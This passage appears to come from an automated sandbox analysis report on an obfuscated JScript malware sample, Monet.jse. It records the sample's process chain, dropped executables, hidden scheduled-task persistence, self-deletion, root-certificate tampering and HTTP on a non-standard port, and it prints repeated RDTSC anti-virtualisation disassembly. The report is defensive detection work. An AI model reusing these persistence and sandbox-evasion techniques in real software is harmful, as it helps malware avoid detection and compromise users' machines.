Source: svchost.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Users\user\AppData\Local\Temp\431846743.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_13-898
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_17-920
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\Monet.jse' 578
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\431846743.exe 'C:\Users\user\AppData\Local\Temp\431846743.exe'
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {09EF86CB-0344-4609-A443-6612E4A0A019} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknownProcess created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe svchost.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\431846743.exe 'C:\Users\user\AppData\Local\Temp\431846743.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\431846743.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe Jump to behavior
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\System32\svchost.exeFile written: C:\Users\user\AppData\Roaming\WinNetCore\settings.iniJump to behavior

Data Obfuscation:

barindex
Potential obfuscated javascript foundShow sources
Source: Monet.jseInitial file: High amount of function use 1673
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800949E0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,36_2_00000001800949E0
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800C5F85 push rbx; iretd 36_2_00000001800C5F86

Persistence and Installation Behavior:

barindex
Yara detected PersistenceViaHiddenTaskShow sources
Source: Yara matchFile source: 00000010.00000003.56164497578.00000000008AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3172, type: MEMORY
Source: Yara matchFile source: Process Memory Space: taskeng.exe PID: 3388, type: MEMORY
Drops PE filesShow sources
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\431846743.exeJump to dropped file

Boot Survival:

barindex
Yara detected PersistenceViaHiddenTaskShow sources
Source: Yara matchFile source: 00000010.00000003.56164497578.00000000008AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3172, type: MEMORY
Source: Yara matchFile source: Process Memory Space: taskeng.exe PID: 3388, type: MEMORY

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installationShow sources
Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\monet.jseJump to behavior
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 8082
Source: unknownNetwork traffic detected: HTTP traffic on port 8082 -> 49203
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\AppData\Local\Temp\431846743.exeCode function: 13_2_00401A57 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,13_2_00401A57
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeCode function: 17_2_00401A57 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,17_2_00401A57
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000001800B6170 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,36_2_00000001800B6170
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Stores large binary data to the registryShow sources
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\431846743.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\431846743.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\431846743.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
Source: C:\Windows\System32\svchost.exeFunction Chain: fileOpened,fileOpened,fileCreated,fileWritten,threadDelayed,fileOpened,fileRead,handleClosed,fileOpened,fileRead,threadCreated,threadDelayed,sectionLoaded,sectionLoaded,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 xor edx, edx 0x0000000b div esi 0x0000000d mov ebx, edx 0x0000000f test ebp, ebp 0x00000011 je 2AA5968Ch 0x00000013 mov ecx, dword ptr [edi+ebx*4] 0x00000016 lea eax, dword ptr [ebp+01h] 0x00000019 test ecx, ecx 0x0000001b jne 2AA59327h 0x0000001d mov ebp, eax 0x0000001f call 2AA42696h 0x00000024 dec eax 0x00000025 sub esp, 28h 0x00000028 call dword ptr [0001BF96h] 0x0000002e jmp 2AA59350h 0x00000030 jmp dword ptr [0007C47Ah] 0x00000036 mov ecx, dword ptr [7FFE0004h] 0x0000003d dec eax 0x0000003e mov eax, dword ptr [7FFE0320h] 0x00000045 dec eax 0x00000046 imul eax, ecx 0x00000049 dec eax 0x0000004a shr eax, 18h 0x0000004d ret 0x0000004e mov ecx, eax 0x00000050 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F876h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA594F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59513h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59150h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59150h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4FBF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
